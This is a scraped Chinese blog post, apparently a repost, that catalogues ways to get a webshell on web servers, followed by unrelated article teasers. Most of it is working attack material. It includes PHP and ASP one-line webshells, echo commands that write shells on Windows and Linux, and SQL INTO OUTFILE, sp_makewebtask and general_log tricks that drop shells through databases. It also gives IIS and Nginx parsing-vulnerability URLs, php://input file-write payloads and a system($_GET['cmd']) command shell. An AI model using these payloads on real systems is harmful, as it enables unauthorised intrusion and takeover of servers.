Skip to main content

moregeek program

网站渗透总结之getshell用法大全_mb6242cc9db1000的博客-多极客编程

Getshell分为进管理员后台Getshell和不进后台Getshell,本文主要总结常见进后台Getshell和部分。

一、进后台Getshell

进台Getshel

1、管理员后台直接Getshell

管理员后台直接上传Getshell,有时候带密码的Webshell连接时容易被waf拦截,可以上传不加密的Webshell如有权限限制可以尝试管理后台自带的修改文件名功能在文件名前加../来穿越目录,如上传的文件为a.php,将a.php修改为../a.php。

0

2、后台数据库备份Getshell

后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可),<%eval

然后再通过备份数据库后访问此界面Getshell。


二、各类上传Getshell

各类上传Getshell

1、修改网站上传类型Getshell

修改网站上传类型,后台设置中添加aasps|asp|php|jsp|aspx|asa|cer,保存后上传aasps文件,上传后为asp文件可以解析Getshll。

05

2、上传其他脚本类型Getshell

一台服务器有多个站,如a网站为asp脚本,b网站为php脚本,而a中限制了上传文件类型为asp的文件,此时可以上传php的脚本,来拿shell;也可以尝试脚本文件后缀名改为asa或者在后面直接加个.如xx.asp.来突破文件类型限制进行上传来Getshell

三、解析漏洞Getshell

1、IIS6.0解析漏洞

​http://www.xxx.com/xx.asp/xx.jpg​

​http://www.xxx.com/xx.asp/xx.txt​

​http://www.xxx.com/xx.asp/xx.asp;jpg​

02

2、IIS7.0/7.5、Nginx<8.0解析漏洞

​http://www.xxx.com/xx.jpg/.php​

03

3、Nginx<8.03空字节代码执行漏洞

版本范围:Nginx0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

​http://www.xxx.com/xx.jpg%00.php​


0

4、Apache解析漏洞

​http://www.xxx.com/xx.php.owf.rar​​逆向解析,直到能解析出php为止


5、CVE-2013-4547 Nginx解析漏洞

​http://www.xxx.com/xx.jpg(非编码空格)\0.php​

四、编辑漏洞Getshell

1、网站配置插马Getshell

进入后台后,网站配置插马getshell,可以找到源码本地搭建,插入时注意与源码闭合,如果插入出错可能导致网站报废。如asp中单引号表示单行注释作用

​%><%eval request("v01cano")%><%​

2、编辑器模版Getshell

通过网站的模版编写一句话,然后生成脚本文件getshell 通过将木马添加到压缩文件,把名字改为网站的模版类型,上传到服务器,getshell)(新建或修改目录名为xx.asp/ 此目录下的jsp,html会以asp执行,配置iis6.有0解析漏洞 。

3、修改脚本文件Getshell

修改后台脚本文件插入一句话直接Getshell,尽量插在头和尾 。

4、上传插件、更新页面Getshell

进入wordpress,dz等,如编辑wordpress404页面插入一句话,可以先下载对应版本找到404路径,部分OA上传插件Getshell, jboss,tomcat上传war包getshell等。

5、执行sql语句写入Webshell

首先执行错误的sql语句,使其暴露出网站的根目录,以ecshop为例,进入后台执行sql查询

​select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";​

关于此语句说明,在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号,有时候也不需要分号。也可以先将一句话通过ecshop的新建管理员写入到user表中,然后通过数据库备份配合解析漏洞Getshell。

五、命令执行Getshel

1、Windows

echo ^<^?php @eval($_POST[C0cho]);?^>^ >c:\1.php
2、Linux
echo -e "<?php @assert(\$_POST[C0cho])?>" > 1.php

Linux需要在$前加\进行防转义,Windows需要在<前加^防转义,Windows和Linux中的 “可以使用’或不使用进行尝试

六、文件包含Getshell

1、asp包含

​include file="123.jpg"​​调用的文件必须和被调用的文件在同一目录,否则找不到,如果不在同一目录,用下面语句也使用如下代码​​include virtual="文件所在目录/123.jpg"​

2、php包含

<?php
include('123.jpg');
?>

03

3、使用php://input

使用burpsuite截取数据包,并修改内容转发(还可以使用hackbar工具中的post data中输入​​<?php fputs(fopen("shell1.php","w"),'1111<?php @assert($_POST[xss])?>2222')?>等一句话木马)​

截取get请求

网站渗透总结之Getshell用法大全_上传

将一句话木马

网站渗透总结之Getshell用法大全_上传_02

访问浏览器查看是否成功

网站渗透总结之Getshell用法大全_php_03

七、数据库命令执行Getshell


1、Access导出

Access可导出xxx等文件需要配合解析漏洞。

create table cmd (a varchar(50));
insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%>
select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd
drop table cmd

菜刀直连​​https://www.webshell.cc/1.asa;x.xls​


2、Sqlserver导出

exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>"


3、Mysql导出

以phpMyAdmin为例:

方法一

create TABLE xiaoma (xiaoma1 text NOT NULL);
insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma]);?>');
select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
drop TABLE IF EXISTS xiaoma;

方法二

select "<?php eval($_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/a.php'

方法三

当数据库路径未知时Getshell

//创建表a,并且将httpd.conf写入到表a中
create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;

然后执行导出操作,将该文件下载,使用notepad++打开,最后搜索documentroot,即可找到网站的根目录:

网站渗透总结之Getshell用法大全_php_04

文件可能存在的一些路径:

# Windows
c:\windows\php.ini # php配置文件
c:\windows\system32\inetsrv\MetaBase.xml # IIS虚拟主机配置文件
# Linux
/etc/php.ini # php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf # Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/mysql
/user/local/httpd/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf # 虚拟目录配置文件
/user/local/nginx/conf/httpd.conf # Nginx配置文件

方法四

通过load_file函数直接加载该文件内容

select load_file('C:/phpStudy/Apache/conf/httpd.conf');

同时需要做如下配置

网站渗透总结之Getshell用法大全_上传_05

网站渗透总结之Getshell用法大全_数据库_06

方法五

general_log_file方法获取Webshell,show global variables like 'secure%'显示secure_file_priv的值为NULL,不能利用写into outfile写木马getshell。

show global variables like "%genera%";  #查看genera文件配置情况
set global general_log = off; #关闭general_log
set global general_log = 'on'; #如果general_log关闭需要开启
set global general_log_file = 'D:/www/web/shell.php'

方法六

可执行命令方式

​select '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/shell.php'​

使用方法

www.xxx.com/shell.php?cmd=ipconfig  #cmd=后面加命令

方法七

过杀毒软件方式,上传图片马c.jpg,图片马内容如下:

​www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令​

导出Webshell

​select '<?php include 'c.jpg'?>' INTO OUTFILE 'D:/work/www/shell.php'​

方法八

直接导出加密Webshell

​select unhex('加密代码') into dumpfile 'D:/www/web/shell.php'​

八、不进后台Getshell

1、0day Getshell

各类OA,coremail,cms,php框架,数据库,java框架等0day,1day,nday Getshell 。

2、写入日志Getshell

获取日志路径,在访问过程中在url或者其他位置写入​​<?php eval($_POST[c]);?>;​​等信息,使其日志记录此代码,然后访问日志路径,菜刀连接Getshell,如phpinfo();中能查看到error.log和access.log的路径。

0

3、IIS/Tomcat写权限Getshell

IIS6.0,put协议上传手工或工具,批量扫描工具:iis put scaner,写权限利用:桂林老兵

Tomcat put上传 CVE-2017-12615 工具传送门:https://link.zhihu.com/?target=https%3A//github.com/iBearcat/CVE-2017-12615

0

4、上传会员头像Getshell

将Webshell放入文件夹,然后压缩成zip文件。上传正常头像抓包将图片文件内容删除,burp右键选择文件黏贴功能,将zip包内容复制到burp中的图片内容,放行后菜刀连接图片上传路径下的文件夹(zip压缩包名)下的Webshell 。

5、远程命令执行

参考Linux/Windows反弹shell,脚本语言、powershell反弹shell,Kali/Cobalt Strike等各种上线方法 。

6、其他漏洞Getshell

XXE,SSRF,反序列化,strust2等一种或多种组合利用Getshell 。

©著作权归作者所有:来自51CTO博客作者LinkSLA的原创作品,请联系作者获取转载授权,否则将追究法律责任

9个gaussdb常用的对象语句_华为云开发者社区的博客-多极客编程

摘要:本文介绍了9个GaussDB常用的对象语句,希望对大家有帮助。本文分享自华为云社区《​​GaussDB对象相关语句​​》,作者:酷哥。1. 常用函数pg_database_size() -- 数据库使用的磁盘空间。pg_table_size() -- 表使用的磁盘空间。pg_total_relation_size() -- 表和索引共使用的磁盘空间。pg_indexes_size() --

【技术提升计划】「攀登技术领域的巅峰」教你学透mysql技术原理及设计调优_李博alex的博客-多极客编程

个人简介        Hi,大家好,我是李浩宇/Alex,目前在一家互联网公司担任技术研发经理,之前曾就职于神州数码和优酷。擅长的领域是Java技术体系(Java源码分析和JVM原理分析), MySQL原理和调优等。专栏介绍      相信只要有一定经验的开发人员、都会多多少少了解MySQL数据库,它已经是国内最受欢迎也是使用率最高的数据库之一。      接下来我就讲在之前工作中遇到的棘手问题

【测试开发全栈-html】(8)css字体属性之字体大小_小小迷糊的博客-多极客编程

今天讲了怎么使用css中font-family来设置字体,如微软雅黑、宋体、Arial等。继续讲下使用font-size属性来定义字体大小。  语法如下:  p {    font-size:20px;}px(像素)大小是我们网页的最常用的单位。谷歌浏览器默认的字体大小为16px 不同浏览器可能默认显示的字体字号大小不一致,尽量给一个明确值大小,不要默认大小。可以给<body>指定整个

图片处理 - php 工具类_owenzhang的博客-多极客编程

图片处理 - PHP 工具类 <?php /** * Created by PhpStorm. * User: peeke * Date: 2020/4/22 * Time: 08:53 */ namespace App\common\Helpers\tools; class ImageHelper { /** * 增加图片样式,防止图片在手机端显示溢出

4.深度学习(1) --神经网络编程入门_domi+1的博客-多极客编程

前言目前深度学习、AI研究很火爆,它们依赖的最底层就是简单的神经网络,本文将介绍神经网络基础,了解基本的神经网络原理,同时给出样例参考,该样例可以推广到其他的分类、回归问题分析关键字:神经网络,BP,网络结构,梯度正文本文主要内容包括: (1) 介绍神经网络基本原理,(2)  Matlab实现前向神经网络的方法。第0节、引例 本文以Fisher的Iris数据集作为神经网络程序的测试数据集。由于英文

2.数值计算(1) --求解连续微分系统和混沌系统_domi+1的博客-多极客编程

前言微分系统在工程项目中很常见,通过物理建模之后,基本都需要求解微分方程得到其结果,混沌系统属于特殊的一类微分系统,在某些项目上也很常见,同时可以引申出分岔图、李雅普诺夫指数谱、相图、庞加莱截面等,本文探讨通过matlab常见的微分求解函数和simulink求解器来实现计算。关键字:微分系统,混沌系统,Simulink正文1、常微分方程(Lorenze混沌系统)方法1:m文件实现x0=[0;0;1

linux实用命令汇总_唐米2020的博客-多极客编程

                                   Linux实用命令汇总​序号命令名称使用说明实例【解释】1cd切换路径​cd /home:进入到/home路径下面cd /:回到根目录cd -:回到之前的目录cd ~:回到当前用户的家目录2su切换用户su - tester1:切换到用户tester13pwd显示当前的目录4init + 数字Linux运行级别的调整init 0

oracle数据库密码过期,修改密码并设置永久有效_清晨的博客-多极客编程

1、直接修改密码1、直接修改password zhangsan2、密码已经过期alter user zhangsan identified by '密码' account unlock;2、设置密码过期时间Oracle数据库 11g默认密码过期时间为180天过期1、使用SQL语句查找密码过期用户所属的profileselect username,profile from dba_users;2、查

mysql 5.7.21 移植指南(openeuler 20.03 lts sp1)_openeuler的博客-多极客编程

简要介绍 本文主要用于指导在openEuler 20.03 sp1 操作系统上部署mysql数据库。 MySQL 是一款安全、跨平台、高效的,并与 PHP、Java 等主流编程语言紧密结合的数据库系统。 本案例使用x86_64架构虚拟机,通过评估工具x2openEuler评估MySQL 5.7.21软件移植到openEuler操作系统的兼容性,再实施数据搬迁。 建议使用版本为MySQL 5.7.2

linux将shell脚本设置为开机启动_雍州无名的博客-多极客编程

以bluebridge.tar.gz包为例子进行相关介绍1.解压包tar zxvf bluebridge.tar.gz2.将解压包放在/usr/local/目录下mv out /usr/local/bbserver3.修改相应的配置文件cd /usr/local/bbserver修改run_bbserver.sh文件 4.将其设置为开机启动服务cd /etc/init.d vim bbserver

配置master无密码登陆所有的slave_雍州无名的博客-多极客编程

1.SSH无密码原理master(NameNode | JobTracker)作为客户端,要实现无密码公钥认证,连接到服务器salve(DataNode | Tasktracker)上时,需要在master上生成一个密钥对,包括一个公钥和一个私钥,而后将公钥复制到所有的slave上。当master通过SSH连接salve时,salve就会生成一个随机数并用master的公钥对随机数进行加密,并发送

mysqlclient 安装问题_wx5f8e308c74f08的博客-多极客编程

OSError: mysql_config not foundERROR: Command errored out with exit status 1: command: /Users/kai/Desktop/workspace/Projects/work_hour/work_hours_system_backend/venv/bin/python3 -c 'import sys, se